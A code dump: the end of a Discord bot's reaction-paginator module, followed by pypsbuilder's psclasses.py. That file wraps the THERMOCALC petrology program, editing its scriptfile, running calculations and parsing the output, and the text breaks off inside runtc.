"type": type,
"page": 0,
"trigger": ctx.message.id,
"sender": ctx.author.id
}
for k, v in kwargs.items():
data[k] = v
known_messages[str(message.id)] = data
try:
if has_pages: await message.add_reaction(Emoji.get_emoji('LEFT'))
for e in emoji: await message.add_reaction(e)
if has_pages: await message.add_reaction(Emoji.get_emoji('RIGHT'))
except discord.Forbidden:
await ctx.send(
f"{Emoji.get_chat_emoji('WARNING')} {Translator.translate('paginator_missing_perms', ctx, prev=Emoji.get_chat_emoji('LEFT'), next=Emoji.get_chat_emoji('RIGHT'))} {Emoji.get_chat_emoji('WARNING')}")
if len(known_messages.keys()) > 500:
del known_messages[list(known_messages.keys())[0]]
save_to_disc()
async def update(bot, message, action, user):
message_id = str(message.id)
if message_id in known_messages.keys():
type = known_messages[message_id]["type"]
if type in page_handlers.keys():
data = known_messages[message_id]
if data["sender"] == user or page_handlers[type]["sender_only"] is False:
page_num = data["page"]
try:
trigger_message = await message.channel.get_message(data["trigger"])
except discord.NotFound:
trigger_message = None
ctx = await bot.get_context(trigger_message) if trigger_message is not None else None
text, embed, page = await page_handlers[type]["update"](ctx, message, page_num, action, data)
await message.edit(content=text, embed=embed)
known_messages[message_id]["page"] = page
save_to_disc()
return True
return False
def basic_pages(pages, page_num, action):
if action == "PREV":
page_num -= 1
elif action == "NEXT":
page_num += 1
if page_num < 0:
page_num = len(pages) - 1
if page_num >= len(pages):
page_num = 0
page = pages[page_num]
return page, page_num
def paginate(input, max_lines=20, max_chars=1900, prefix="", suffix=""):
max_chars -= len(prefix) + len(suffix)
lines = str(input).splitlines(keepends=True)
pages = []
page = ""
count = 0
for line in lines:
if len(page) + len(line) > max_chars or count == max_lines:
if page == "":
# single 2k line, split smaller
words = line.split(" ")
for word in words:
if len(page) + len(word) > max_chars:
pages.append(f"{prefix}{page}{suffix}")
page = f"{word} "
else:
page += f"{word} "
else:
pages.append(f"{prefix}{page}{suffix}")
page = line
count = 1
else:
page += line
count += 1
pages.append(f"{prefix}{page}{suffix}")
return pages
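# Minimal usage sketch (illustrative only): splitting a long listing into
# Discord-sized chunks with the defaults used throughout the cogs.
#   pages = paginate("\n".join(f"line {i}" for i in range(100)), max_lines=20)
#   # -> 5 pages, each at most 20 lines and well under 1900 characters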
def paginate_fields(input):
pages = []
for page in input:
page_fields = dict()
for name, content in page.items():
page_fields[name] = paginate(content, max_chars=1024)
pages.append(page_fields)
real_pages = []
for page in pages:
page_count = 0
page_fields = dict()
for name, parts in page.items():
base_name = name
            if len(parts) == 1:
if page_count + len(name) + len(parts[0]) > 4000:
real_pages.append(page_fields)
page_fields = dict()
page_count = 0
page_fields[name] = parts[0]
page_count += len(name) + len(parts[0])
else:
for i in range(len(parts)):
part = parts[i]
name = f"{base_name} ({i+1}/{len(parts)})"
if page_count + len(name) + len(part) > 3000:
real_pages.append(page_fields)
page_fields = dict()
page_count = 0
page_fields[name] = part
page_count += len(name) + len(part)
real_pages.append(page_fields)
return real_pages
def save_to_disc():
Utils.saveToDisk("known_messages", known_messages)
def load_from_disc():
global known_messages
known_messages = Utils.fetch_from_disk("known_messages")
``` |
{
"source": "johnytian/pypsbuilder",
"score": 2
} |
#### File: pypsbuilder/pypsbuilder/psclasses.py
```python
import sys
import os
try:
import cPickle as pickle
except ImportError:
import pickle
import gzip
import subprocess
# import itertools
# import re
from pathlib import Path
# from collections import OrderedDict
import numpy as np
import matplotlib.pyplot as plt
from shapely.geometry import LineString, Point
from shapely.ops import polygonize, linemerge # unary_union
popen_kw = dict(stdout=subprocess.PIPE, stdin=subprocess.PIPE,
stderr=subprocess.STDOUT, universal_newlines=False)
polymorphs = [{'sill', 'and'}, {'ky', 'and'}, {'sill', 'ky'}, {'q', 'coe'}, {'diam', 'gph'}]
"""list: List of two-element sets containing polymorphs."""
class InitError(Exception):
pass
class ScriptfileError(Exception):
pass
class TCError(Exception):
pass
class TCAPI(object):
"""THERMOCALC working directory API.
Attributes:
workdir (pathlib.Path): Path instance pointing to working directory.
tcexe (pathlib.Path): Path instance pointing to *THERMOCALC* executable.
        drexe (pathlib.Path): Path instance pointing to *drawpd* executable.
name (str): Basename of the project.
axname (str): Name of a-x file in use.
OK (bool): Boolean value. True when all settings are correct and
THERMOCALC is ready to be used by builders.
excess (set): Set of excess phases from scriptfile.
trange (tuple): Tuple of temperature window from setdefTwindow
prange (tuple): Tuple of pressure window from setdefPwindow
bulk (list): List of bulk composition(s).
ptx_steps (int): Number of compositional steps for T-X and P-X sections.
phases (list): List of names of available phases.
TCenc (str): Encoding used for THERMOCALC output text files.
Default 'mac-roman'.
Raises:
InitError: An error occurred during initialization of working dir.
ScriptfileError: Error or problem in scriptfile.
TCError: THERMOCALC bombed.
"""
def __init__(self, workdir, tcexe=None, drexe=None):
self.workdir = Path(workdir).resolve()
self.TCenc = 'mac-roman'
try:
errinfo = 'Initialize project error!'
self.tcexe = None
self.drexe = None
if tcexe is not None:
self.tcexe = self.workdir / tcexe
if drexe is not None:
self.drexe = self.workdir / drexe
if self.tcexe is None:
# default exe
if sys.platform.startswith('win'):
tcpat = 'tc3*.exe'
else:
tcpat = 'tc3*'
# THERMOCALC exe
for p in self.workdir.glob(tcpat):
if p.is_file() and os.access(str(p), os.X_OK):
self.tcexe = p.resolve()
break
if self.drexe is None:
# default exe
if sys.platform.startswith('win'):
drpat = 'dr1*.exe'
else:
drpat = 'dr1*'
# DRAWPD exe
for p in self.workdir.glob(drpat):
if p.is_file() and os.access(str(p), os.X_OK):
self.drexe = p.resolve()
break
if not self.tcexe:
raise InitError('No THERMOCALC executable in working directory.')
# if not self.drexe:
# InitError('No drawpd executable in working directory.')
# tc-prefs file
if not self.workdir.joinpath('tc-prefs.txt').exists():
raise InitError('No tc-prefs.txt file in working directory.')
errinfo = 'tc-prefs.txt file in working directory cannot be accessed.'
for line in self.workdir.joinpath('tc-prefs.txt').open('r', encoding=self.TCenc):
kw = line.split()
if kw != []:
if kw[0] == 'scriptfile':
self.name = kw[1]
if not self.scriptfile.exists():
                            raise InitError('tc-prefs: scriptfile tc-' + self.name + '.txt does not exist in your working directory.')
if kw[0] == 'calcmode':
if kw[1] != '1':
raise InitError('tc-prefs: calcmode must be 1.')
if kw[0] == 'dontwrap':
if kw[1] != 'no':
raise InitError('tc-prefs: dontwrap must be no.')
# defaults
self.ptx_steps = 20 # IS IT NEEDED ????
# Checks various settings
errinfo = 'Scriptfile error!'
with self.scriptfile.open('r', encoding=self.TCenc) as f:
r = f.read()
lines = [ln.strip() for ln in r.splitlines() if ln.strip() != '']
lines = lines[:lines.index('*')] # remove part not used by TC
# Check pypsbuilder blocks
if not ('%{PSBCALC-BEGIN}' in lines and '%{PSBCALC-END}' in lines):
raise ScriptfileError('There are not {PSBCALC-BEGIN} and {PSBCALC-END} tags in your scriptfile.')
if not ('%{PSBGUESS-BEGIN}' in lines and '%{PSBGUESS-END}' in lines):
raise ScriptfileError('There are not {PSBGUESS-BEGIN} and {PSBGUESS-END} tags in your scriptfile.')
if not ('%{PSBBULK-BEGIN}' in lines and '%{PSBBULK-END}' in lines):
raise ScriptfileError('There are not {PSBBULK-BEGIN} and {PSBBULK-END} tags in your scriptfile.')
# Create scripts directory
scripts = {}
for ln in lines:
ln_clean = ln.split('%')[0].strip()
if ln_clean != '':
tokens = ln_clean.split(maxsplit=1)
if len(tokens) > 1:
if tokens[0] in scripts:
scripts[tokens[0]].append(tokens[1].strip())
else:
scripts[tokens[0]] = [tokens[1].strip()]
else:
scripts[tokens[0]] = []
# axfile
if 'axfile' not in scripts:
raise ScriptfileError('No axfile script, axfile is mandatory script.')
errinfo = 'Missing argument for axfile script in scriptfile.'
self.axname = scripts['axfile'][0]
if not self.axfile.exists():
                raise ScriptfileError('axfile ' + str(self.axfile) + ' does not exist in working directory')
# diagramPT
if 'diagramPT' not in scripts:
raise ScriptfileError('No diagramPT script, diagramPT is mandatory script.')
errinfo = 'Wrong arguments for diagramPT script in scriptfile.'
pmin, pmax, tmin, tmax = scripts['diagramPT'][0].split()
self.prange = float(pmin), float(pmax)
self.trange = float(tmin), float(tmax)
# bulk
errinfo = 'Wrong bulk in scriptfile.'
if 'bulk' not in scripts:
raise ScriptfileError('No bulk script, bulk must be provided.')
if not (1 < len(scripts['bulk']) < 4):
raise ScriptfileError('Bulk script must have 2 or 3 lines.')
self.bulk = []
self.bulk.append(scripts['bulk'][0].split())
self.bulk.append(scripts['bulk'][1].split())
if len(scripts['bulk']) == 3:
self.bulk.append(scripts['bulk'][2].split()[:len(self.bulk[0])]) # remove possible number of steps
# inexcess
errinfo = 'Wrong inexcess in scriptfile.'
if 'setexcess' in scripts:
                raise ScriptfileError('setexcess script deprecated, use inexcess instead.')
if 'inexcess' in scripts:
if scripts['inexcess']:
self.excess = set(scripts['inexcess'][0].split()) - set(['no'])
else:
raise ScriptfileError('In case of no excess phases, use inexcess no')
# omit
errinfo = 'Wrong omit in scriptfile.'
if 'omit' in scripts:
self.omit = set(scripts['omit'][0].split())
else:
self.omit = set()
# samecoding
if 'samecoding' in scripts:
self.samecoding = [set(sc.split()) for sc in scripts['samecoding']]
# pseudosection
if 'pseudosection' not in scripts:
raise ScriptfileError('No pseudosection script, pseudosection is mandatory script.')
# autoexit
if 'autoexit' not in scripts:
raise ScriptfileError('No autoexit script, autoexit must be provided.')
# dogmin
if 'dogmin' in scripts:
raise ScriptfileError('Dogmin script should be removed from scriptfile.')
# TC
errinfo = 'Error during initial TC run.'
calcs = ['calcP {}'.format(sum(self.prange) / 2),
'calcT {}'.format(sum(self.trange) / 2),
'with xxx']
old_calcs = self.update_scriptfile(get_old_calcs=True, calcs=calcs)
output = self.runtc()
self.update_scriptfile(calcs=old_calcs)
if '-- run bombed in whichphases' not in output:
raise TCError(output)
self.tcout = output.split('-- run bombed in whichphases')[0].strip()
ax_phases = set(self.tcout.split('reading ax:')[1].split(2 * os.linesep)[0].split())
# which
if 'with' in scripts:
if scripts['with'][0].split()[0] == 'someof':
                    raise ScriptfileError('Pypsbuilder does not support with someof <phase list>. Use omit {}'.format(' '.join(ax_phases.union(*self.samecoding) - set(scripts['with'][0].split()[1:]))))
# union ax phases and samecoding and diff omit
self.phases = ax_phases.union(*self.samecoding) - self.omit
# OK
self.status = 'Initial check done.'
self.OK = True
except BaseException as e:
if isinstance(e, InitError) or isinstance(e, ScriptfileError) or isinstance(e, TCError):
self.status = '{}: {}'.format(type(e).__name__, str(e))
else:
self.status = '{}: {} {}'.format(type(e).__name__, str(e), errinfo)
self.OK = False
def __str__(self):
return str(self.workdir)
def __repr__(self):
if self.OK:
return '\n'.join(['{}'.format(self.tcversion),
'Working directory: {}'.format(self.workdir),
'Scriptfile: {}'.format('tc-' + self.name + '.txt'),
'AX file: {}'.format('tc-' + self.axname + '.txt'),
'Status: {}'.format(self.status)])
else:
return '\n'.join(['Uninitialized working directory {}'.format(self.workdir),
'Status: {}'.format(self.status)])
@property
def scriptfile(self):
"""pathlib.Path: Path to scriptfile."""
return self.workdir.joinpath('tc-' + self.name + '.txt')
def read_scriptfile(self):
with self.scriptfile.open('r', encoding=self.TCenc) as f:
r = f.read()
return r
@property
def drfile(self):
"""pathlib.Path: Path to -dr output file."""
return self.workdir.joinpath('tc-' + self.name + '-dr.txt')
@property
def logfile(self):
"""pathlib.Path: Path to THERMOCALC log file."""
return self.workdir.joinpath('tc-log.txt')
@property
def icfile(self):
"""pathlib.Path: Path to ic file."""
return self.workdir.joinpath('tc-' + self.name + '-ic.txt')
@property
def itfile(self):
"""pathlib.Path: Path to it file."""
return self.workdir.joinpath('tc-' + self.name + '-it.txt')
@property
def ofile(self):
"""pathlib.Path: Path to project output file."""
return self.workdir.joinpath('tc-' + self.name + '-o.txt')
@property
def csvfile(self):
"""pathlib.Path: Path to csv file."""
return self.workdir.joinpath('tc-' + self.name + '-csv.txt')
@property
def drawpdfile(self):
"""pathlib.Path: Path to drawpd file."""
return self.workdir.joinpath('dr-' + self.name + '.txt')
@property
def axfile(self):
"""pathlib.Path: Path to used a-x file."""
return self.workdir.joinpath('tc-' + self.axname + '.txt')
@property
def prefsfile(self):
"""pathlib.Path: Path to THERMOCALC prefs file."""
return self.workdir.joinpath('tc-prefs.txt')
def read_prefsfile(self):
with self.prefsfile.open('r', encoding=self.TCenc) as f:
r = f.read()
return r
@property
def tcversion(self):
"""str: Version identification of THERMCALC executable."""
return self.tcout.split('\n')[0]
@property
def tcnewversion(self):
"""bool: False for THERMOCALC older than 3.5."""
return not float(self.tcversion.split()[1]) < 3.5
@property
def datasetfile(self):
"""pathlib.Path: Path to dataset file."""
return self.workdir.joinpath(self.dataset.split(' produced')[0])
@property
def dataset(self):
"""str: Version identification of thermodynamic dataset in use."""
return self.tcout.split('using ')[1].split('\n')[0]
def parse_logfile(self, **kwargs):
"""Parser for THERMOCALC output.
It parses the outputs of THERMOCALC after calculation.
Args:
tx (bool): True for T-X and P-X calculations. Default False.
output (str): When not None, used as content of logfile. Default None.
resic (str): When not None, used as content of icfile. Default None.
Returns:
status (str): Result of parsing. 'ok', 'nir' (nothing in range) or 'bombed'.
results (TCResultSet): Results of TC calculation.
output (str): Full nonparsed THERMOCALC output.
Example:
Parse output after univariant line calculation in P-T pseudosection::
                >>> tc = TCAPI('path/to/dir')
>>> status, result, output = tc.parse_logfile()
"""
if self.tcnewversion:
return self.parse_logfile_new(**kwargs)
else:
return self.parse_logfile_old(**kwargs)
def parse_logfile_new(self, **kwargs):
output = kwargs.get('output', None)
resic = kwargs.get('resic', None)
try:
if output is None:
with self.logfile.open('r', encoding=self.TCenc) as f:
output = f.read().split('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n')[1]
lines = [ln for ln in output.splitlines() if ln != '']
results = None
do_parse = True
if resic is None:
if not self.icfile.exists():
if [ix for ix, ln in enumerate(lines) if 'BOMBED' in ln]:
status = 'bombed'
else:
status = 'nir'
do_parse = False
else:
with self.icfile.open('r', encoding=self.TCenc) as f:
resic = f.read()
if do_parse:
lines = [ln for ln in output.splitlines() if ln != '']
# parse ptguesses
bstarts = [ix for ix, ln in enumerate(lines) if ln.startswith('------------------------------------------------------------')]
bstarts.append(len(lines))
ptguesses = []
corrects = []
for bs, be in zip(bstarts[:-1], bstarts[1:]):
block = lines[bs:be]
if block[2].startswith('#'):
corrects.append(False)
else:
corrects.append(True)
xyz = [ix for ix, ln in enumerate(block) if ln.startswith('xyzguess')]
gixs = [ix for ix, ln in enumerate(block) if ln.startswith('ptguess')][0] - 3
gixe = xyz[-1] + 2
ptguesses.append(block[gixs:gixe])
# parse icfile
blocks = resic.split('\n===========================================================\n\n')[1:]
# done
if len(blocks) > 0:
rlist = [TCResult.from_block(block, ptguess) for block, ptguess, correct in zip(blocks, ptguesses, corrects) if correct]
if len(rlist) > 0:
status = 'ok'
results = TCResultSet(rlist)
else:
status = 'nir'
else:
status = 'nir'
return status, results, output
except Exception:
return 'bombed', None, None
def parse_logfile_new_backup(self, **kwargs):
output = kwargs.get('output', None)
resic = kwargs.get('resic', None)
if output is None:
with self.logfile.open('r', encoding=self.TCenc) as f:
output = f.read()
lines = [ln for ln in output.splitlines() if ln != '']
results = None
do_parse = True
if resic is None:
if not self.icfile.exists():
if [ix for ix, ln in enumerate(lines) if 'BOMBED' in ln]:
status = 'bombed'
else:
status = 'nir'
do_parse = False
else:
with self.icfile.open('r', encoding=self.TCenc) as f:
resic = f.read()
if do_parse:
lines = [ln for ln in output.splitlines() if ln != '']
# parse ptguesses
bstarts = [ix for ix, ln in enumerate(lines) if ln.startswith('--------------------------------------------------------------------')]
bstarts.append(len(lines))
ptguesses = []
corrects = []
for bs, be in zip(bstarts[:-1], bstarts[1:]):
block = lines[bs:be]
if block[2].startswith('#'):
corrects.append(False)
else:
corrects.append(True)
xyz = [ix for ix, ln in enumerate(block) if ln.startswith('xyzguess')]
gixs = [ix for ix, ln in enumerate(block) if ln.startswith('ptguess')][0] - 3
gixe = xyz[-1] + 2
ptguesses.append(block[gixs:gixe])
# parse icfile
blocks = resic.split('\n===========================================================\n\n')[1:]
# done
if len(blocks) > 0:
rlist = [TCResult.from_block(block, ptguess) for block, ptguess, correct in zip(blocks, ptguesses, corrects) if correct]
if len(rlist) > 0:
status = 'ok'
results = TCResultSet(rlist)
else:
status = 'nir'
else:
status = 'nir'
return status, results, output
def parse_logfile_old(self, **kwargs):
# res is list of dicts with data and ptguess keys
# data is dict with keys of phases and each contain dict of values
# res[0]['data']['g']['mode']
# res[0]['data']['g']['z']
# res[0]['data']['g']['MnO']
output = kwargs.get('output', None)
if output is None:
with self.logfile.open('r', encoding=self.TCenc) as f:
output = f.read()
lines = [''.join([c for c in ln if ord(c) < 128]) for ln in output.splitlines() if ln != '']
pts = []
res = []
variance = -1
if [ix for ix, ln in enumerate(lines) if 'BOMBED' in ln]:
status = 'bombed'
else:
for ln in lines:
if 'variance of required equilibrium' in ln:
variance = int(ln[ln.index('(') + 1:ln.index('?')])
break
bstarts = [ix for ix, ln in enumerate(lines) if ln.startswith(' P(kbar)')]
bstarts.append(len(lines))
for bs, be in zip(bstarts[:-1], bstarts[1:]):
block = lines[bs:be]
pts.append([float(n) for n in block[1].split()[:2]])
xyz = [ix for ix, ln in enumerate(block) if ln.startswith('xyzguess')]
gixs = [ix for ix, ln in enumerate(block) if ln.startswith('ptguess')][0] - 3
gixe = xyz[-1] + 2
ptguess = block[gixs:gixe]
data = {}
rbix = [ix for ix, ln in enumerate(block) if ln.startswith('rbi yes')][0]
phases = block[rbix - 1].split()[1:]
for phase, val in zip(phases, block[rbix].split()[2:]):
data[phase] = dict(mode=float(val))
for ix in xyz:
lbl = block[ix].split()[1]
phase, comp = lbl[lbl.find('(') + 1:lbl.find(')')], lbl[:lbl.find('(')]
if phase not in data:
raise Exception('Check model {} in your ax file. Commonly liq coded as L for starting guesses.'.format(phase))
data[phase][comp] = float(block[ix].split()[2])
rbiox = block[rbix + 1].split()[2:]
for delta in range(len(phases)):
rbi = {c: float(v) for c, v in zip(rbiox, block[rbix + 2 + delta].split()[2:-2])}
rbi['H2O'] = float(block[rbix + 2 + delta].split()[1])
# data[phases[delta]]['rbi'] = comp
data[phases[delta]].update(rbi)
res.append(dict(data=data, ptguess=ptguess))
if res:
status = 'ok'
pp, TT = np.array(pts).T
results = TCResultSet([TCResult(T, p, variance=variance, step=0.0, data=r['data'], ptguess=r['ptguess']) for (r, p, T) in zip(res, pp, TT)])
else:
status = 'nir'
results = None
return status, results, output
def parse_dogmin_old(self):
"""Dogmin parser."""
try:
with self.icfile.open('r', encoding=self.TCenc) as f:
resic = f.read()
with self.logfile.open('r', encoding=self.TCenc) as f:
output = f.read()
res = output.split('##########################################################\n')[-1]
except Exception:
res = None
resic = None
return res, resic
def parse_dogmin(self):
"""Dogmin parser."""
try:
with self.icfile.open('r', encoding=self.TCenc) as f:
resic = f.read()
with self.logfile.open('r', encoding=self.TCenc) as f:
output = f.read()
except Exception:
output = None
resic = None
return output, resic
def update_scriptfile(self, **kwargs):
"""Method to update scriptfile.
This method is used to programatically edit scriptfile.
Kwargs:
calcs: List of lines defining fully hands-off calculations. Default None.
get_old_calcs: When True method returns existing calcs lines
before possible modification. Default False.
guesses: List of lines defining ptguesses. If None guesses
are not modified. Default None.
get_old_guesses: When True method returns existing ptguess lines
before possible modification. Default False.
bulk: List of lines defining bulk composition. Default None.
xsteps: Number of compositional steps between two bulks.
Default 20.
"""
calcs = kwargs.get('calcs', None)
get_old_calcs = kwargs.get('get_old_calcs', False)
guesses = kwargs.get('guesses', None)
get_old_guesses = kwargs.get('get_old_guesses', False)
bulk = kwargs.get('bulk', None)
xsteps = kwargs.get('xsteps', None)
with self.scriptfile.open('r', encoding=self.TCenc) as f:
scf = f.read()
changed = False
scf_1, rem = scf.split('%{PSBCALC-BEGIN}')
old, scf_2 = rem.split('%{PSBCALC-END}')
old_calcs = old.strip().splitlines()
if calcs is not None:
scf = scf_1 + '%{PSBCALC-BEGIN}\n' + '\n'.join(calcs) + '\n%{PSBCALC-END}' + scf_2
changed = True
scf_1, rem = scf.split('%{PSBGUESS-BEGIN}')
old, scf_2 = rem.split('%{PSBGUESS-END}')
old_guesses = old.strip().splitlines()
if guesses is not None:
scf = scf_1 + '%{PSBGUESS-BEGIN}\n' + '\n'.join(guesses) + '\n%{PSBGUESS-END}' + scf_2
changed = True
if bulk is not None:
scf_1, rem = scf.split('%{PSBBULK-BEGIN}')
old, scf_2 = rem.split('%{PSBBULK-END}')
bulk_lines = []
if len(bulk) == 2:
bulk_lines.append('bulk {}'.format(' '.join(bulk[0])))
bulk_lines.append('bulk {}'.format(' '.join(bulk[1])))
else:
bulk_lines.append('bulk {}'.format(' '.join(bulk[0])))
bulk_lines.append('bulk {}'.format(' '.join(bulk[1])))
bulk_lines.append('bulk {} {}'.format(' '.join(bulk[2]), xsteps))
scf = scf_1 + '%{PSBBULK-BEGIN}\n' + '\n'.join(bulk_lines) + '\n%{PSBBULK-END}' + scf_2
changed = True
if xsteps is not None:
bulk_lines = []
scf_1, rem = scf.split('%{PSBBULK-BEGIN}')
old, scf_2 = rem.split('%{PSBBULK-END}')
if len(self.bulk) == 3:
bulk_lines.append('bulk {}'.format(' '.join(self.bulk[0])))
bulk_lines.append('bulk {}'.format(' '.join(self.bulk[1])))
bulk_lines.append('bulk {} {}'.format(' '.join(self.bulk[2]), xsteps))
scf = scf_1 + '%{PSBBULK-BEGIN}\n' + '\n'.join(bulk_lines) + '\n%{PSBBULK-END}' + scf_2
changed = True
if changed:
with self.scriptfile.open('w', encoding=self.TCenc) as f:
f.write(scf)
if get_old_calcs and get_old_guesses:
return old_calcs, old_guesses
elif get_old_calcs:
return old_calcs
elif get_old_guesses:
return old_guesses
else:
return None
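    # Typical round-trip used by other methods in this class (e.g. dogmin, calc_variance);
    # shown here only as an illustrative note:
    #   old_calcs = self.update_scriptfile(get_old_calcs=True, calcs=new_calcs)
    #   tcout = self.runtc()
    #   self.update_scriptfile(calcs=old_calcs)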
def interpolate_bulk(self, x):
if len(self.bulk) == 2:
new_bulk = []
try:
_ = (e for e in x)
except TypeError:
b1 = np.array([float(v) for v in self.bulk[0]])
b2 = np.array([float(v) for v in self.bulk[1]])
db = b2 - b1
bi = b1 + x * db
new_bulk.append(['{:g}'.format(v) for v in bi])
else:
for x_val in x:
b1 = np.array([float(v) for v in self.bulk[0]])
b2 = np.array([float(v) for v in self.bulk[1]])
db = b2 - b1
bi = b1 + x_val * db
new_bulk.append(['{:g}'.format(v) for v in bi])
else:
new_bulk = self.bulk[0]
return new_bulk
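    # Illustrative example (made-up numbers): with bulk[0] = ['40', '40', '20'] and
    # bulk[1] = ['20', '60', '20'], interpolate_bulk(0.5) returns [['30', '50', '20']],
    # i.e. the linear mix b1 + x * (b2 - b1) formatted back to strings.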
def calc_t(self, phases, out, **kwargs):
"""Method to run THERMOCALC to find univariant line using Calc T at P strategy.
Args:
phases (set): Set of present phases
out (set): Set of single zero mode phase
            prange (tuple): Pressure range for calculation
            trange (tuple): Temperature range for calculation
            steps (int): Number of steps
        Returns:
            tuple: (tcout, calcs) standard output and input for THERMOCALC run.
            Input calcs could be used to reproduce calculation.
"""
prange = kwargs.get('prange', self.prange)
trange = kwargs.get('trange', self.trange)
steps = kwargs.get('steps', 50)
step = (prange[1] - prange[0]) / steps
calcs = ['calcP {:g} {:g} {:g}'.format(*prange, step),
'calcT {:g} {:g}'.format(*trange),
'calctatp yes',
'with {}'.format(' '.join(phases - self.excess)),
'zeromodeisopleth {}'.format(' '.join(out))]
self.update_scriptfile(calcs=calcs)
tcout = self.runtc()
return tcout, calcs
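    # Illustrative example (hypothetical values): with prange=(2, 10), trange=(500, 700),
    # steps=50, out={'g'} and phases - excess = {'g', 'bi', 'mu'}, the generated calcs are
    #   ['calcP 2 10 0.16', 'calcT 500 700', 'calctatp yes', 'with g bi mu', 'zeromodeisopleth g']
    # (the order of phases after 'with' depends on set iteration order).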
def calc_p(self, phases, out, **kwargs):
"""Method to run THERMOCALC to find univariant line using Calc P at T strategy.
Args:
phases (set): Set of present phases
out (set): Set of single zero mode phase
            prange (tuple): Pressure range for calculation
            trange (tuple): Temperature range for calculation
            steps (int): Number of steps
        Returns:
            tuple: (tcout, calcs) standard output and input for THERMOCALC run.
            Input calcs could be used to reproduce calculation.
"""
prange = kwargs.get('prange', self.prange)
trange = kwargs.get('trange', self.trange)
steps = kwargs.get('steps', 50)
step = (trange[1] - trange[0]) / steps
calcs = ['calcP {:g} {:g}'.format(*prange),
'calcT {:g} {:g} {:g}'.format(*trange, step),
'calctatp no',
'with {}'.format(' '.join(phases - self.excess)),
'zeromodeisopleth {}'.format(' '.join(out))]
self.update_scriptfile(calcs=calcs)
tcout = self.runtc()
return tcout, calcs
def calc_pt(self, phases, out, **kwargs):
"""Method to run THERMOCALC to find invariant point.
Args:
phases (set): Set of present phases
out (set): Set of two zero mode phases
            prange (tuple): Pressure range for calculation
            trange (tuple): Temperature range for calculation
        Returns:
            tuple: (tcout, calcs) standard output and input for THERMOCALC run.
            Input calcs could be used to reproduce calculation.
"""
prange = kwargs.get('prange', self.prange)
trange = kwargs.get('trange', self.trange)
calcs = ['calcP {:g} {:g}'.format(*prange),
'calcT {:g} {:g}'.format(*trange),
'with {}'.format(' '.join(phases - self.excess)),
'zeromodeisopleth {}'.format(' '.join(out))]
self.update_scriptfile(calcs=calcs)
tcout = self.runtc()
return tcout, calcs
def calc_tx(self, phases, out, **kwargs):
"""Method to run THERMOCALC for T-X pseudosection calculations.
Args:
phases (set): Set of present phases
out (set): Set of zero mode phases
            prange (tuple): Pressure range for calculation
            trange (tuple): Temperature range for calculation
            xvals (tuple): range for X variable
            steps (int): Number of steps
        Returns:
            tuple: (tcout, calcs) standard output and input for THERMOCALC run.
            Input calcs could be used to reproduce calculation.
"""
prange = kwargs.get('prange', self.prange)
trange = kwargs.get('trange', self.trange)
xvals = kwargs.get('xvals', (0, 1))
steps = kwargs.get('steps', 20)
step = (prange[1] - prange[0]) / steps
if prange[0] == prange[1]:
calcs = ['calcP {:g} {:g}'.format(*prange),
'calcT {:g} {:g}'.format(*trange),
'calctatp yes',
'with {}'.format(' '.join(phases - self.excess)),
'zeromodeisopleth {}'.format(' '.join(out)),
'bulksubrange {:g} {:g}'.format(*xvals)]
else:
calcs = ['calcP {:g} {:g} {:g}'.format(*prange, step),
'calcT {:g} {:g}'.format(*trange),
'calctatp yes',
'with {}'.format(' '.join(phases - self.excess)),
'zeromodeisopleth {}'.format(' '.join(out)),
'bulksubrange {:g} {:g}'.format(*xvals)]
self.update_scriptfile(calcs=calcs, xsteps=steps)
tcout = self.runtc()
return tcout, calcs
def calc_px(self, phases, out, **kwargs):
"""Method to run THERMOCALC for p-X pseudosection calculations.
Args:
phases (set): Set of present phases
out (set): Set of zero mode phases
            prange (tuple): Pressure range for calculation
            trange (tuple): Temperature range for calculation
            xvals (tuple): range for X variable
            steps (int): Number of steps
        Returns:
            tuple: (tcout, calcs) standard output and input for THERMOCALC run.
            Input calcs could be used to reproduce calculation.
"""
prange = kwargs.get('prange', self.prange)
trange = kwargs.get('trange', self.trange)
xvals = kwargs.get('xvals', (0, 1))
steps = kwargs.get('steps', 20)
step = (trange[1] - trange[0]) / steps
if trange[0] == trange[1]:
calcs = ['calcP {:g} {:g}'.format(*prange),
'calcT {:g} {:g}'.format(*trange),
'calctatp no',
'with {}'.format(' '.join(phases - self.excess)),
'zeromodeisopleth {}'.format(' '.join(out)),
'bulksubrange {:g} {:g}'.format(*xvals)]
else:
calcs = ['calcP {:g} {:g}'.format(*prange),
'calcT {:g} {:g} {:g}'.format(*trange, step),
'calctatp no',
'with {}'.format(' '.join(phases - self.excess)),
'zeromodeisopleth {}'.format(' '.join(out)),
'bulksubrange {:g} {:g}'.format(*xvals)]
self.update_scriptfile(calcs=calcs, xsteps=steps)
tcout = self.runtc()
return tcout, calcs
def calc_assemblage(self, phases, p, t, onebulk=None):
"""Method to run THERMOCALC to calculate compositions of stable assemblage.
Args:
phases (set): Set of present phases
            p (float): Pressure for calculation
            t (float): Temperature for calculation
        Returns:
            tuple: (tcout, calcs) standard output and input for THERMOCALC run.
            Input calcs could be used to reproduce calculation.
"""
calcs = ['calcP {}'.format(p),
'calcT {}'.format(t),
'with {}'.format(' '.join(phases - self.excess))]
if onebulk is not None:
calcs.append('onebulk {}'.format(onebulk))
self.update_scriptfile(calcs=calcs)
tcout = self.runtc('\nkill\n\n')
return tcout, calcs
def dogmin(self, phases, p, t, variance, doglevel=1, onebulk=None):
"""Run THERMOCALC dogmin session.
Args:
variance (int): Maximum variance to be considered
Returns:
str: THERMOCALC standard output
"""
calcs = ['calcP {}'.format(p),
'calcT {}'.format(t),
'dogmin yes {}'.format(doglevel),
'with {}'.format(' '.join(phases - self.excess)),
'maxvar {}'.format(variance)]
if onebulk is not None:
calcs.append('onebulk {}'.format(onebulk))
old_calcs = self.update_scriptfile(get_old_calcs=True, calcs=calcs)
tcout = self.runtc('\nkill\n\n')
self.update_scriptfile(calcs=old_calcs)
return tcout
def calc_variance(self, phases):
"""Get variance of assemblage.
Args:
phases (set): Set of present phases
Returns:
int: variance
"""
variance = None
calcs = ['calcP {} {}'.format(*self.prange),
'calcT {} {}'.format(*self.trange),
'with {}'.format(' '.join(phases - self.excess)),
'acceptvar no']
old_calcs = self.update_scriptfile(get_old_calcs=True, calcs=calcs)
tcout = self.runtc('kill\n\n')
self.update_scriptfile(calcs=old_calcs)
for ln in tcout.splitlines():
if 'variance of required equilibrium' in ln:
variance = int(ln[ln.index('(') + 1:ln.index('?')])
break
return variance
def runtc(self, instr='kill\n\n'):
"""Low-level method to actually run THERMOCALC.
Args:
